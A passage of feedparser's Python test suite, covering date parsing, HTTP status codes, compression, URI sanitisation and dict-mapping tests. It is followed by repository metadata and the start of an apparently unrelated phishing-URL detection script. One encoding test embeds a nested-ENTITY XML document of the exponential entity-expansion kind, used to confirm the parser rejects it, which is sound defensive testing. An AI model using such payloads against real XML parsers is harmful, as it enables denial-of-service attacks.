evalString = re.sub(unicode1_re, _s2bytes(" '"), evalString)
evalString = re.sub(unicode2_re, _s2bytes(' "'), evalString)
if not eval(evalString, globals(), env):
failure=(msg or 'not eval(%s) \nWITH env(%s)' % (evalString, pprint.pformat(env)))
raise self.failureException, failure
class BaseTestCase(unittest.TestCase):
failUnlessEval = failUnlessEval
class TestCase(BaseTestCase):
pass
class TestTemporaryFallbackBehavior(unittest.TestCase):
"These tests are temporarily here because of issues 310 and 328"
def test_issue_328_fallback_behavior(self):
warnings.filterwarnings('error')
d = feedparser.FeedParserDict()
d['published'] = u'pub string'
d['published_parsed'] = u'pub tuple'
d['updated'] = u'upd string'
d['updated_parsed'] = u'upd tuple'
# Ensure that `updated` doesn't map to `published` when it exists
self.assertTrue('published' in d)
self.assertTrue('published_parsed' in d)
self.assertTrue('updated' in d)
self.assertTrue('updated_parsed' in d)
self.assertEqual(d['published'], 'pub string')
self.assertEqual(d['published_parsed'], 'pub tuple')
self.assertEqual(d['updated'], 'upd string')
self.assertEqual(d['updated_parsed'], 'upd tuple')
d = feedparser.FeedParserDict()
d['published'] = u'pub string'
d['published_parsed'] = u'pub tuple'
# Ensure that `updated` doesn't actually exist
self.assertTrue('updated' not in d)
self.assertTrue('updated_parsed' not in d)
# Ensure that accessing `updated` throws a DeprecationWarning
try:
d['updated']
except DeprecationWarning:
# Expected behavior
pass
else:
# Wrong behavior
self.assertEqual(True, False)
try:
d['updated_parsed']
except DeprecationWarning:
# Expected behavior
pass
else:
# Wrong behavior
self.assertEqual(True, False)
# Ensure that `updated` maps to `published`
warnings.filterwarnings('ignore')
self.assertEqual(d['updated'], u'pub string')
self.assertEqual(d['updated_parsed'], u'pub tuple')
warnings.resetwarnings()
class TestEverythingIsUnicode(unittest.TestCase):
"Ensure that `everythingIsUnicode()` is working appropriately"
def test_everything_is_unicode(self):
self.assertTrue(everythingIsUnicode(
{'a': u'a', 'b': [u'b', {'c': u'c'}], 'd': {'e': u'e'}}
))
def test_not_everything_is_unicode(self):
self.assertFalse(everythingIsUnicode({'a': _s2bytes('a')}))
self.assertFalse(everythingIsUnicode({'a': [_s2bytes('a')]}))
self.assertFalse(everythingIsUnicode({'a': {'b': _s2bytes('b')}}))
self.assertFalse(everythingIsUnicode({'a': [{'b': _s2bytes('b')}]}))
class TestLooseParser(BaseTestCase):
"Test the sgmllib-based parser by manipulating feedparser " \
"into believing no XML parsers are installed"
def __init__(self, arg):
unittest.TestCase.__init__(self, arg)
self._xml_available = feedparser._XML_AVAILABLE
def setUp(self):
feedparser._XML_AVAILABLE = 0
def tearDown(self):
feedparser._XML_AVAILABLE = self._xml_available
class TestStrictParser(BaseTestCase):
pass
class TestMicroformats(BaseTestCase):
pass
class TestEncodings(BaseTestCase):
def test_doctype_replacement(self):
"Ensure that non-ASCII-compatible encodings don't hide " \
"disallowed ENTITY declarations"
doc = """<?xml version="1.0" encoding="utf-16be"?>
<!DOCTYPE feed [
<!ENTITY exponential1 "bogus ">
<!ENTITY exponential2 "&exponential1;&exponential1;">
<!ENTITY exponential3 "&exponential2;&exponential2;">
]>
<feed><title type="html">&exponential3;</title></feed>"""
doc = codecs.BOM_UTF16_BE + doc.encode('utf-16be')
result = feedparser.parse(doc)
self.assertEqual(result['feed']['title'], u'&exponential3')
def test_gb2312_converted_to_gb18030_in_xml_encoding(self):
# \u55de was chosen because it exists in gb18030 but not gb2312
feed = u'''<?xml version="1.0" encoding="gb2312"?>
<feed><title>\u55de</title></feed>'''
result = feedparser.parse(feed.encode('gb18030'), response_headers={
'Content-Type': 'text/xml'
})
self.assertEqual(result.encoding, 'gb18030')
class TestFeedParserDict(unittest.TestCase):
"Ensure that FeedParserDict returns values as expected and won't crash"
def setUp(self):
self.d = feedparser.FeedParserDict()
def _check_key(self, k):
self.assertTrue(k in self.d)
self.assertTrue(hasattr(self.d, k))
self.assertEqual(self.d[k], 1)
self.assertEqual(getattr(self.d, k), 1)
def _check_no_key(self, k):
self.assertTrue(k not in self.d)
self.assertTrue(not hasattr(self.d, k))
def test_empty(self):
keys = (
'a','entries', 'id', 'guid', 'summary', 'subtitle', 'description',
'category', 'enclosures', 'license', 'categories',
)
for k in keys:
self._check_no_key(k)
self.assertTrue('items' not in self.d)
self.assertTrue(hasattr(self.d, 'items')) # dict.items() exists
def test_neutral(self):
self.d['a'] = 1
self._check_key('a')
def test_single_mapping_target_1(self):
self.d['id'] = 1
self._check_key('id')
self._check_key('guid')
def test_single_mapping_target_2(self):
self.d['guid'] = 1
self._check_key('id')
self._check_key('guid')
def test_multiple_mapping_target_1(self):
self.d['summary'] = 1
self._check_key('summary')
self._check_key('description')
def test_multiple_mapping_target_2(self):
self.d['subtitle'] = 1
self._check_key('subtitle')
self._check_key('description')
def test_multiple_mapping_mapped_key(self):
self.d['description'] = 1
self._check_key('summary')
self._check_key('description')
def test_license(self):
self.d['links'] = []
try:
self.d['license']
self.assertTrue(False)
except KeyError:
pass
self.d['links'].append({'rel': 'license'})
try:
self.d['license']
self.assertTrue(False)
except KeyError:
pass
self.d['links'].append({'rel': 'license', 'href': 'http://dom.test/'})
self.assertEqual(self.d['license'], 'http://dom.test/')
def test_category(self):
self.d['tags'] = []
try:
self.d['category']
self.assertTrue(False)
except KeyError:
pass
self.d['tags'] = [{}]
try:
self.d['category']
self.assertTrue(False)
except KeyError:
pass
self.d['tags'] = [{'term': 'cat'}]
self.assertEqual(self.d['category'], 'cat')
self.d['tags'].append({'term': 'dog'})
self.assertEqual(self.d['category'], 'cat')
class TestOpenResource(unittest.TestCase):
"Ensure that `_open_resource()` interprets its arguments as URIs, " \
"file-like objects, or in-memory feeds as expected"
def test_fileobj(self):
r = feedparser._open_resource(sys.stdin, '', '', '', '', [], {})
self.assertTrue(r is sys.stdin)
def test_feed(self):
f = feedparser.parse(u'feed://localhost:8097/tests/http/target.xml')
self.assertEqual(f.href, u'http://localhost:8097/tests/http/target.xml')
def test_feed_http(self):
f = feedparser.parse(u'feed:http://localhost:8097/tests/http/target.xml')
self.assertEqual(f.href, u'http://localhost:8097/tests/http/target.xml')
def test_bytes(self):
s = '<feed><item><title>text</title></item></feed>'.encode('utf-8')
r = feedparser._open_resource(s, '', '', '', '', [], {})
self.assertEqual(s, r.read())
def test_string(self):
s = '<feed><item><title>text</title></item></feed>'
r = feedparser._open_resource(s, '', '', '', '', [], {})
self.assertEqual(s.encode('utf-8'), r.read())
def test_unicode_1(self):
s = u'<feed><item><title>text</title></item></feed>'
r = feedparser._open_resource(s, '', '', '', '', [], {})
self.assertEqual(s.encode('utf-8'), r.read())
def test_unicode_2(self):
s = u'<feed><item><title>t\u00e9xt</title></item></feed>'
r = feedparser._open_resource(s, '', '', '', '', [], {})
self.assertEqual(s.encode('utf-8'), r.read())
class TestMakeSafeAbsoluteURI(unittest.TestCase):
"Exercise the URI joining and sanitization code"
base = u'http://d.test/d/f.ext'
def _mktest(rel, expect, doc):
def fn(self):
value = feedparser._makeSafeAbsoluteURI(self.base, rel)
self.assertEqual(value, expect)
fn.__doc__ = doc
return fn
# make the test cases; the call signature is:
# (relative_url, expected_return_value, test_doc_string)
test_abs = _mktest(u'https://s.test/', u'https://s.test/', 'absolute uri')
test_rel = _mktest(u'/new', u'http://d.test/new', 'relative uri')
test_bad = _mktest(u'x://bad.test/', u'', 'unacceptable uri protocol')
test_mag = _mktest(u'magnet:?xt=a', u'magnet:?xt=a', 'magnet uri')
def test_catch_ValueError(self):
'catch ValueError in Python 2.7 and up'
uri = u'http://bad]test/'
value1 = feedparser._makeSafeAbsoluteURI(uri)
value2 = feedparser._makeSafeAbsoluteURI(self.base, uri)
swap = feedparser.ACCEPTABLE_URI_SCHEMES
feedparser.ACCEPTABLE_URI_SCHEMES = ()
value3 = feedparser._makeSafeAbsoluteURI(self.base, uri)
feedparser.ACCEPTABLE_URI_SCHEMES = swap
# Only Python 2.7 and up throw a ValueError, otherwise uri is returned
self.assertTrue(value1 in (uri, u''))
self.assertTrue(value2 in (uri, u''))
self.assertTrue(value3 in (uri, u''))
class TestConvertToIdn(unittest.TestCase):
"Test IDN support (unavailable in Jython as of Jython 2.5.2)"
# this is the greek test domain
hostname = u'\u03c0\u03b1\u03c1\u03ac\u03b4\u03b5\u03b9\u03b3\u03bc\u03b1'
hostname += u'.\u03b4\u03bf\u03ba\u03b9\u03bc\u03ae'
def test_control(self):
r = feedparser._convert_to_idn(u'http://example.test/')
self.assertEqual(r, u'http://example.test/')
def test_idn(self):
r = feedparser._convert_to_idn(u'http://%s/' % (self.hostname,))
self.assertEqual(r, u'http://xn--hxajbheg2az3al.xn--jxalpdlp/')
def test_port(self):
r = feedparser._convert_to_idn(u'http://%s:8080/' % (self.hostname,))
self.assertEqual(r, u'http://xn--hxajbheg2az3al.xn--jxalpdlp:8080/')
class TestCompression(unittest.TestCase):
"Test the gzip and deflate support in the HTTP code"
def test_gzip_good(self):
f = feedparser.parse('http://localhost:8097/tests/compression/gzip.gz')
self.assertEqual(f.version, 'atom10')
def test_gzip_not_compressed(self):
f = feedparser.parse('http://localhost:8097/tests/compression/gzip-not-compressed.gz')
self.assertEqual(f.bozo, 1)
self.assertTrue(isinstance(f.bozo_exception, IOError))
self.assertEqual(f['feed']['title'], 'gzip')
def test_gzip_struct_error(self):
f = feedparser.parse('http://localhost:8097/tests/compression/gzip-struct-error.gz')
self.assertEqual(f.bozo, 1)
self.assertTrue(isinstance(f.bozo_exception, struct.error))
def test_zlib_good(self):
f = feedparser.parse('http://localhost:8097/tests/compression/deflate.z')
self.assertEqual(f.version, 'atom10')
def test_zlib_no_headers(self):
f = feedparser.parse('http://localhost:8097/tests/compression/deflate-no-headers.z')
self.assertEqual(f.version, 'atom10')
def test_zlib_not_compressed(self):
f = feedparser.parse('http://localhost:8097/tests/compression/deflate-not-compressed.z')
self.assertEqual(f.bozo, 1)
self.assertTrue(isinstance(f.bozo_exception, zlib.error))
self.assertEqual(f['feed']['title'], 'deflate')
class TestHTTPStatus(unittest.TestCase):
"Test HTTP redirection and other status codes"
def test_301(self):
f = feedparser.parse('http://localhost:8097/tests/http/http_status_301.xml')
self.assertEqual(f.status, 301)
self.assertEqual(f.href, 'http://localhost:8097/tests/http/target.xml')
self.assertEqual(f.entries[0].title, 'target')
def test_302(self):
f = feedparser.parse('http://localhost:8097/tests/http/http_status_302.xml')
self.assertEqual(f.status, 302)
self.assertEqual(f.href, 'http://localhost:8097/tests/http/target.xml')
self.assertEqual(f.entries[0].title, 'target')
def test_303(self):
f = feedparser.parse('http://localhost:8097/tests/http/http_status_303.xml')
self.assertEqual(f.status, 303)
self.assertEqual(f.href, 'http://localhost:8097/tests/http/target.xml')
self.assertEqual(f.entries[0].title, 'target')
def test_307(self):
f = feedparser.parse('http://localhost:8097/tests/http/http_status_307.xml')
self.assertEqual(f.status, 307)
self.assertEqual(f.href, 'http://localhost:8097/tests/http/target.xml')
self.assertEqual(f.entries[0].title, 'target')
def test_304(self):
# first retrieve the url
u = 'http://localhost:8097/tests/http/http_status_304.xml'
f = feedparser.parse(u)
self.assertEqual(f.status, 200)
self.assertEqual(f.entries[0].title, 'title 304')
# extract the etag and last-modified headers
e = [v for k, v in f.headers.items() if k.lower() == 'etag'][0]
mh = [v for k, v in f.headers.items() if k.lower() == 'last-modified'][0]
ms = f.updated
mt = f.updated_parsed
        md = datetime.datetime(*mt[0:6])
self.assertTrue(isinstance(mh, basestring))
self.assertTrue(isinstance(ms, basestring))
self.assertTrue(isinstance(mt, time.struct_time))
self.assertTrue(isinstance(md, datetime.datetime))
# test that sending back the etag results in a 304
f = feedparser.parse(u, etag=e)
self.assertEqual(f.status, 304)
# test that sending back last-modified (string) results in a 304
f = feedparser.parse(u, modified=ms)
self.assertEqual(f.status, 304)
# test that sending back last-modified (9-tuple) results in a 304
f = feedparser.parse(u, modified=mt)
self.assertEqual(f.status, 304)
# test that sending back last-modified (datetime) results in a 304
f = feedparser.parse(u, modified=md)
self.assertEqual(f.status, 304)
def test_404(self):
f = feedparser.parse('http://localhost:8097/tests/http/http_status_404.xml')
self.assertEqual(f.status, 404)
def test_9001(self):
f = feedparser.parse('http://localhost:8097/tests/http/http_status_9001.xml')
self.assertEqual(f.bozo, 1)
def test_redirect_to_304(self):
# ensure that an http redirect to an http 304 doesn't
# trigger a bozo_exception
u = 'http://localhost:8097/tests/http/http_redirect_to_304.xml'
f = feedparser.parse(u)
self.assertTrue(f.bozo == 0)
self.assertTrue(f.status == 302)
class TestDateParsers(unittest.TestCase):
"Test the various date parsers; most of the test cases are constructed " \
"dynamically based on the contents of the `date_tests` dict, below"
def test_None(self):
self.assertTrue(feedparser._parse_date(None) is None)
def _check_date(self, func, dtstring, dttuple):
try:
tup = func(dtstring)
except (OverflowError, ValueError):
tup = None
self.assertEqual(tup, dttuple)
self.assertEqual(tup, feedparser._parse_date(dtstring))
def test_year_10000_date(self):
# On some systems this date string will trigger an OverflowError.
# On Jython and x64 systems, however, it's interpreted just fine.
try:
date = feedparser._parse_date_rfc822(u'Sun, 31 Dec 9999 23:59:59 -9999')
except OverflowError:
date = None
self.assertTrue(date in (None, (10000, 1, 5, 4, 38, 59, 2, 5, 0)))
date_tests = {
feedparser._parse_date_greek: (
(u'', None), # empty string
(u'\u039a\u03c5\u03c1, 11 \u0399\u03bf\u03cd\u03bb 2004 12:00:00 EST', (2004, 7, 11, 17, 0, 0, 6, 193, 0)),
),
feedparser._parse_date_hungarian: (
(u'', None), # empty string
(u'2004-j\u00falius-13T9:15-05:00', (2004, 7, 13, 14, 15, 0, 1, 195, 0)),
),
feedparser._parse_date_iso8601: (
(u'', None), # empty string
(u'-0312', (2003, 12, 1, 0, 0, 0, 0, 335, 0)), # 2-digit year/month only variant
(u'031231', (2003, 12, 31, 0, 0, 0, 2, 365, 0)), # 2-digit year/month/day only, no hyphens
(u'03-12-31', (2003, 12, 31, 0, 0, 0, 2, 365, 0)), # 2-digit year/month/day only
(u'-03-12', (2003, 12, 1, 0, 0, 0, 0, 335, 0)), # 2-digit year/month only
(u'03335', (2003, 12, 1, 0, 0, 0, 0, 335, 0)), # 2-digit year/ordinal, no hyphens
(u'2003-12-31T10:14:55.1234Z', (2003, 12, 31, 10, 14, 55, 2, 365, 0)), # fractional seconds
# Special case for Google's extra zero in the month
(u'2003-012-31T10:14:55+00:00', (2003, 12, 31, 10, 14, 55, 2, 365, 0)),
),
feedparser._parse_date_nate: (
(u'', None), # empty string
(u'2004-05-25 \uc624\ud6c4 11:23:17', (2004, 5, 25, 14, 23, 17, 1, 146, 0)),
),
feedparser._parse_date_onblog: (
(u'', None), # empty string
(u'2004\ub144 05\uc6d4 28\uc77c 01:31:15', (2004, 5, 27, 16, 31, 15, 3, 148, 0)),
),
feedparser._parse_date_perforce: (
(u'', None), # empty string
(u'Fri, 2006/09/15 08:19:53 EDT', (2006, 9, 15, 12, 19, 53, 4, 258, 0)),
),
feedparser._parse_date_rfc822: (
(u'', None), # empty string
(u'Thu, 01 Jan 0100 00:00:01 +0100', (99, 12, 31, 23, 0, 1, 3, 365, 0)), # ancient date
(u'Thu, 01 Jan 04 19:48:21 GMT', (2004, 1, 1, 19, 48, 21, 3, 1, 0)), # 2-digit year
(u'Thu, 01 Jan 2004 19:48:21 GMT', (2004, 1, 1, 19, 48, 21, 3, 1, 0)), # 4-digit year
(u'Thu, 5 Apr 2012 10:00:00 GMT', (2012, 4, 5, 10, 0, 0, 3, 96, 0)), # 1-digit day
(u'Wed, 19 Aug 2009 18:28:00 Etc/GMT', (2009, 8, 19, 18, 28, 0, 2, 231, 0)), # etc/gmt timezone
        (u'Wed, 19 Feb 2012 22:40:00 GMT-01:01', (2012, 2, 19, 23, 41, 0, 6, 50, 0)), # gmt-hh:mm timezone
(u'Mon, 13 Feb, 2012 06:28:00 UTC', (2012, 2, 13, 6, 28, 0, 0, 44, 0)), # extraneous comma
(u'Thu, 01 Jan 2004 00:00 GMT', (2004, 1, 1, 0, 0, 0, 3, 1, 0)), # no seconds
(u'Thu, 01 Jan 2004', (2004, 1, 1, 0, 0, 0, 3, 1, 0)), # no time
# Additional tests to handle Disney's long month names and invalid timezones
(u'Mon, 26 January 2004 16:31:00 AT', (2004, 1, 26, 20, 31, 0, 0, 26, 0)),
(u'Mon, 26 January 2004 16:31:00 ET', (2004, 1, 26, 21, 31, 0, 0, 26, 0)),
(u'Mon, 26 January 2004 16:31:00 CT', (2004, 1, 26, 22, 31, 0, 0, 26, 0)),
(u'Mon, 26 January 2004 16:31:00 MT', (2004, 1, 26, 23, 31, 0, 0, 26, 0)),
(u'Mon, 26 January 2004 16:31:00 PT', (2004, 1, 27, 0, 31, 0, 1, 27, 0)),
),
feedparser._parse_date_rfc822_grubby: (
(u'Thu Aug 30 2012 17:26:16 +0200', (2012, 8, 30, 15, 26, 16, 3, 243, 0)),
),
feedparser._parse_date_asctime: (
(u'Sun Jan 4 16:29:06 2004', (2004, 1, 4, 16, 29, 6, 6, 4, 0)),
),
feedparser._parse_date_w3dtf: (
(u'', None), # empty string
(u'2003-12-31T10:14:55Z', (2003, 12, 31, 10, 14, 55, 2, 365, 0)), # UTC
(u'2003-12-31T10:14:55-08:00', (2003, 12, 31, 18, 14, 55, 2, 365, 0)), # San Francisco timezone
(u'2003-12-31T18:14:55+08:00', (2003, 12, 31, 10, 14, 55, 2, 365, 0)), # Tokyo timezone
(u'2007-04-23T23:25:47.538+10:00', (2007, 4, 23, 13, 25, 47, 0, 113, 0)), # fractional seconds
(u'2003-12-31', (2003, 12, 31, 0, 0, 0, 2, 365, 0)), # year/month/day only
(u'20031231', (2003, 12, 31, 0, 0, 0, 2, 365, 0)), # year/month/day only, no hyphens
(u'2003-12', (2003, 12, 1, 0, 0, 0, 0, 335, 0)), # year/month only
(u'2003', (2003, 1, 1, 0, 0, 0, 2, 1, 0)), # year only
# MSSQL-style dates
(u'2004-07-08 23:56:58 -00:20', (2004, 7, 9, 0, 16, 58, 4, 191, 0)), # with timezone
(u'2004-07-08 23:56:58', (2004, 7, 8, 23, 56, 58, 3, 190, 0)), # without timezone
(u'2004-07-08 23:56:58.0', (2004, 7, 8, 23, 56, 58, 3, 190, 0)), # with fractional second
# Special cases for out-of-range times
(u'2003-12-31T25:14:55Z', (2004, 1, 1, 1, 14, 55, 3, 1, 0)), # invalid (25 hours)
(u'2003-12-31T10:61:55Z', (2003, 12, 31, 11, 1, 55, 2, 365, 0)), # invalid (61 minutes)
(u'2003-12-31T10:14:61Z', (2003, 12, 31, 10, 15, 1, 2, 365, 0)), # invalid (61 seconds)
# Special cases for rollovers in leap years
(u'2004-02-28T18:14:55-08:00', (2004, 2, 29, 2, 14, 55, 6, 60, 0)), # feb 28 in leap year
(u'2003-02-28T18:14:55-08:00', (2003, 3, 1, 2, 14, 55, 5, 60, 0)), # feb 28 in non-leap year
(u'2000-02-28T18:14:55-08:00', (2000, 2, 29, 2, 14, 55, 1, 60, 0)), # feb 28 in leap year on century divisible by 400
)
}
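# Dynamically attach one test method per (parser, date string, expected tuple)
# so each date case shows up as its own named test in the unittest output.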
def make_date_test(f, s, t):
return lambda self: self._check_date(f, s, t)
for func, items in date_tests.iteritems():
for i, (dtstring, dttuple) in enumerate(items):
uniqfunc = make_date_test(func, dtstring, dttuple)
setattr(TestDateParsers, 'test_%s_%02i' % (func.__name__, i), uniqfunc)
class TestHTMLGuessing(unittest.TestCase):
"Exercise the HTML sniffing code"
def _mktest(text, expect, doc):
def fn(self):
value = bool(feedparser._FeedParserMixin.lookslikehtml(text))
self.assertEqual(value, expect)
fn.__doc__ = doc
return fn
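    # make the test cases; the call signature is:
    # (text_to_sniff, expected_return_value, test_doc_string)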
test_text_1 = _mktest(u'plain text', False, u'plain text')
test_text_2 = _mktest(u'2 < 3', False, u'plain text with angle bracket')
test_html_1 = _mktest(u'<a href="">a</a>', True, u'anchor tag')
test_html_2 = _mktest(u'<i>i</i>', True, u'italics tag')
test_html_3 = _mktest(u'<b>b</b>', True, u'bold tag')
test_html_4 = _mktest(u'<code>', False, u'allowed tag, no end tag')
test_html_5 = _mktest(u'<rss> .. </rss>', False, u'disallowed tag')
test_entity_1 = _mktest(u'AT&T', False, u'corporation name')
test_entity_2 = _mktest(u'©', True, u'named entity reference')
test_entity_3 = _mktest(u'©', True, u'numeric entity reference')
test_entity_4 = _mktest(u'©', True, u'hex numeric entity reference')
#---------- additional api unit tests, not backed by files
class TestBuildRequest(unittest.TestCase):
"Test that HTTP request objects are created as expected"
def test_extra_headers(self):
"""You can pass in extra headers and they go into the request object."""
request = feedparser._build_urllib2_request(
'http://example.com/feed',
'agent-name',
None, None, None, None,
{'Cache-Control': 'max-age=0'})
# nb, urllib2 folds the case of the headers
self.assertEqual(
request.get_header('Cache-control'), 'max-age=0')
class TestLxmlBug(unittest.TestCase):
def test_lxml_etree_bug(self):
try:
import lxml.etree
except ImportError:
pass
else:
doc = u"<feed>&illformed_charref</feed>".encode('utf8')
# Importing lxml.etree currently causes libxml2 to
# throw SAXException instead of SAXParseException.
feedparser.parse(feedparser._StringIO(doc))
self.assertTrue(True)
#---------- parse test files and create test methods ----------
def convert_to_utf8(data):
"Identify data's encoding using its byte order mark" \
"and convert it to its utf-8 equivalent"
if data[:4] == _l2bytes([0x4c, 0x6f, 0xa7, 0x94]):
return data.decode('cp037').encode('utf-8')
elif data[:4] == _l2bytes([0x00, 0x00, 0xfe, 0xff]):
if not _UTF32_AVAILABLE:
return None
return data.decode('utf-32be').encode('utf-8')
elif data[:4] == _l2bytes([0xff, 0xfe, 0x00, 0x00]):
if not _UTF32_AVAILABLE:
return None
return data.decode('utf-32le').encode('utf-8')
elif data[:4] == _l2bytes([0x00, 0x00, 0x00, 0x3c]):
if not _UTF32_AVAILABLE:
return None
return data.decode('utf-32be').encode('utf-8')
elif data[:4] == _l2bytes([0x3c, 0x00, 0x00, 0x00]):
if not _UTF32_AVAILABLE:
return None
return data.decode('utf-32le').encode('utf-8')
elif data[:4] == _l2bytes([0x00, 0x3c, 0x00, 0x3f]):
return data.decode('utf-16be').encode('utf-8')
elif data[:4] == _l2bytes([0x3c, 0x00, 0x3f, 0x00]):
return data.decode('utf-16le').encode('utf-8')
elif (data[:2] == _l2bytes([0xfe, 0xff])) and (data[2:4] != _l2bytes([0x00, 0x00])):
return data[2:].decode('utf-16be').encode('utf-8')
elif (data[:2] == _l2bytes([0xff, 0xfe])) and (data[2:4] != _l2bytes([0x00, 0x00])):
return data[2:].decode('utf-16le').encode('utf-8')
elif data[:3] == _l2bytes([0xef, 0xbb, 0xbf]):
return data[3:]
# no byte order mark was found
return data
skip_re = re.compile(_s2bytes("SkipUnless:\s*(.*?)\n"))
desc_re = re.compile(_s2bytes("Description:\s*(.*?)\s*Expect:\s*(.*)\s*-->"))
def getDescription(xmlfile, data):
"""Extract test data
Each test case is an XML file which contains not only a test feed
but also the description of the test and the condition that we
would expect the parser to create when it parses the feed. Example:
<!--
Description: feed title
Expect: feed['title'] == u'Example feed'
-->
"""
skip_results = skip_re.search(data)
if skip_results:
skipUnless = skip_results.group(1).strip()
else:
skipUnless = '1'
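    # tests without a SkipUnless header default to the always-true
    # expression '1'; runtests() evals this string before adding the test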
search_results = desc_re.search(data)
if not search_results:
raise RuntimeError, "can't parse %s" % xmlfile
description, evalString = map(lambda s: s.strip(), list(search_results.groups()))
description = xmlfile + ": " + unicode(description, 'utf8')
return description, evalString, skipUnless
def buildTestCase(xmlfile, description, evalString):
func = lambda self, xmlfile=xmlfile, evalString=evalString: \
self.failUnlessEval(xmlfile, evalString)
func.__doc__ = description
return func
def runtests():
"Read the files in the tests/ directory, dynamically add tests to the " \
"TestCases above, spawn the HTTP server, and run the test suite"
if sys.argv[1:]:
allfiles = filter(lambda s: s.endswith('.xml'), reduce(operator.add, map(glob.glob, sys.argv[1:]), []))
sys.argv = [sys.argv[0]] #+ sys.argv[2:]
else:
allfiles = glob.glob(os.path.join('.', 'tests', '**', '**', '*.xml'))
wellformedfiles = glob.glob(os.path.join('.', 'tests', 'wellformed', '**', '*.xml'))
illformedfiles = glob.glob(os.path.join('.', 'tests', 'illformed', '*.xml'))
encodingfiles = glob.glob(os.path.join('.', 'tests', 'encoding', '*.xml'))
entitiesfiles = glob.glob(os.path.join('.', 'tests', 'entities', '*.xml'))
microformatfiles = glob.glob(os.path.join('.', 'tests', 'microformats', '**', '*.xml'))
httpd = None
# there are several compression test cases that must be accounted for
# as well as a number of http status tests that redirect to a target
# and a few `_open_resource`-related tests
httpcount = 6 + 17 + 2
httpcount += len([f for f in allfiles if 'http' in f])
httpcount += len([f for f in wellformedfiles if 'http' in f])
httpcount += len([f for f in illformedfiles if 'http' in f])
httpcount += len([f for f in encodingfiles if 'http' in f])
try:
for c, xmlfile in enumerate(allfiles + encodingfiles + illformedfiles + entitiesfiles):
addTo = TestCase
if xmlfile in encodingfiles:
addTo = TestEncodings
elif xmlfile in entitiesfiles:
addTo = (TestStrictParser, TestLooseParser)
elif xmlfile in microformatfiles:
addTo = TestMicroformats
elif xmlfile in wellformedfiles:
addTo = (TestStrictParser, TestLooseParser)
data = open(xmlfile, 'rb').read()
if 'encoding' in xmlfile:
data = convert_to_utf8(data)
if data is None:
# convert_to_utf8 found a byte order mark for utf_32
# but it's not supported in this installation of Python
if 'http' in xmlfile:
httpcount -= 1 + (xmlfile in wellformedfiles)
continue
description, evalString, skipUnless = getDescription(xmlfile, data)
testName = 'test_%06d' % c
ishttp = 'http' in xmlfile
try:
if not eval(skipUnless): raise NotImplementedError
except (ImportError, LookupError, NotImplementedError, AttributeError):
if ishttp:
httpcount -= 1 + (xmlfile in wellformedfiles)
continue
if ishttp:
xmlfile = 'http://%s:%s/%s' % (_HOST, _PORT, posixpath.normpath(xmlfile.replace('\\', '/')))
testFunc = buildTestCase(xmlfile, description, evalString)
if isinstance(addTo, tuple):
setattr(addTo[0], testName, testFunc)
setattr(addTo[1], testName, testFunc)
else:
setattr(addTo, testName, testFunc)
if feedparser.TIDY_MARKUP and feedparser._mxtidy:
sys.stderr.write('\nWarning: feedparser.TIDY_MARKUP invalidates tests, turning it off temporarily\n\n')
feedparser.TIDY_MARKUP = 0
if httpcount:
httpd = FeedParserTestServer(httpcount)
httpd.daemon = True
httpd.start()
httpd.ready.wait()
testsuite = unittest.TestSuite()
testloader = unittest.TestLoader()
testsuite.addTest(testloader.loadTestsFromTestCase(TestCase))
testsuite.addTest(testloader.loadTestsFromTestCase(TestStrictParser))
testsuite.addTest(testloader.loadTestsFromTestCase(TestLooseParser))
testsuite.addTest(testloader.loadTestsFromTestCase(TestEncodings))
testsuite.addTest(testloader.loadTestsFromTestCase(TestDateParsers))
testsuite.addTest(testloader.loadTestsFromTestCase(TestHTMLGuessing))
testsuite.addTest(testloader.loadTestsFromTestCase(TestHTTPStatus))
testsuite.addTest(testloader.loadTestsFromTestCase(TestCompression))
testsuite.addTest(testloader.loadTestsFromTestCase(TestConvertToIdn))
testsuite.addTest(testloader.loadTestsFromTestCase(TestMicroformats))
testsuite.addTest(testloader.loadTestsFromTestCase(TestOpenResource))
testsuite.addTest(testloader.loadTestsFromTestCase(TestFeedParserDict))
testsuite.addTest(testloader.loadTestsFromTestCase(TestMakeSafeAbsoluteURI))
testsuite.addTest(testloader.loadTestsFromTestCase(TestEverythingIsUnicode))
testsuite.addTest(testloader.loadTestsFromTestCase(TestTemporaryFallbackBehavior))
testsuite.addTest(testloader.loadTestsFromTestCase(TestLxmlBug))
testresults = unittest.TextTestRunner(verbosity=1).run(testsuite)
# Return 0 if successful, 1 if there was a failure
sys.exit(not testresults.wasSuccessful())
finally:
if httpd:
if httpd.requests:
# Should never get here unless something went horribly wrong, like the
# user hitting Ctrl-C. Tell our HTTP server that it's done, then do
# one more request to flush it. This rarely works; the combination of
# threading, self-terminating HTTP servers, and unittest is really
# quite flaky. Just what you want in a testing framework, no?
httpd.requests = 0
if httpd.ready:
urllib.urlopen('http://127.0.0.1:8097/tests/wellformed/rss/aaa_wellformed.xml').read()
httpd.join(0)
if __name__ == "__main__":
runtests()
|
{
"content_hash": "01ee1b7f93f30ebe3c06354f3a2fc160",
"timestamp": "",
"source": "github",
"line_count": 857,
"max_line_length": 137,
"avg_line_length": 45.85180863477246,
"alnum_prop": 0.611757221020486,
"repo_name": "milkey-mouse/SongRater",
"id": "aadcf79df084e5baa0b2f293c45a75c3e28befc6",
"size": "39318",
"binary": false,
"copies": "14",
"ref": "refs/heads/master",
"path": "feedparser/feedparsertest.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "106976"
},
{
"name": "CSS",
"bytes": "17968"
},
{
"name": "HTML",
"bytes": "2732"
},
{
"name": "JavaScript",
"bytes": "301526"
},
{
"name": "Python",
"bytes": "540815"
},
{
"name": "Shell",
"bytes": "31"
}
],
"symlink_target": ""
}
|
import sys, getopt
from integrate import integrate
########
# Usage
# python phishing_detection.py -s <string> -i <input_file> -o <output_file>
########
DEFAULT_URL = "https://www.naver.com/"
def call_integrate(url):
    try:
        return integrate(url)
    except Exception:
        # Return a verdict string so callers that build CSV rows from the
        # result don't crash on a None value
        print("Error(001): integrate() failed")
        return "error"
def call_integrate_for_file(input_file_path, output_file_path):
    # Note: relative paths are resolved against the current working
    # directory, so run this script from the project root
    with open(input_file_path, "r") as input_file:
        with open(output_file_path, "w") as output_file:
            # write header
            output_file.write("url,verdict\n")
            # call integrate for each url; the with blocks close both
            # files, so no explicit close() calls are needed
            for url in input_file:
                url = url.rstrip()
                result = call_integrate(url)
                output_file.write(url + "," + result + "\n")
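# Example (using the default paths from main() below): given files/urls.csv
# with one URL per line, this writes files/results.csv with one "url,verdict"
# row per input URL:
#     call_integrate_for_file("files/urls.csv", "files/results.csv")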
def main(argv):
url = DEFAULT_URL
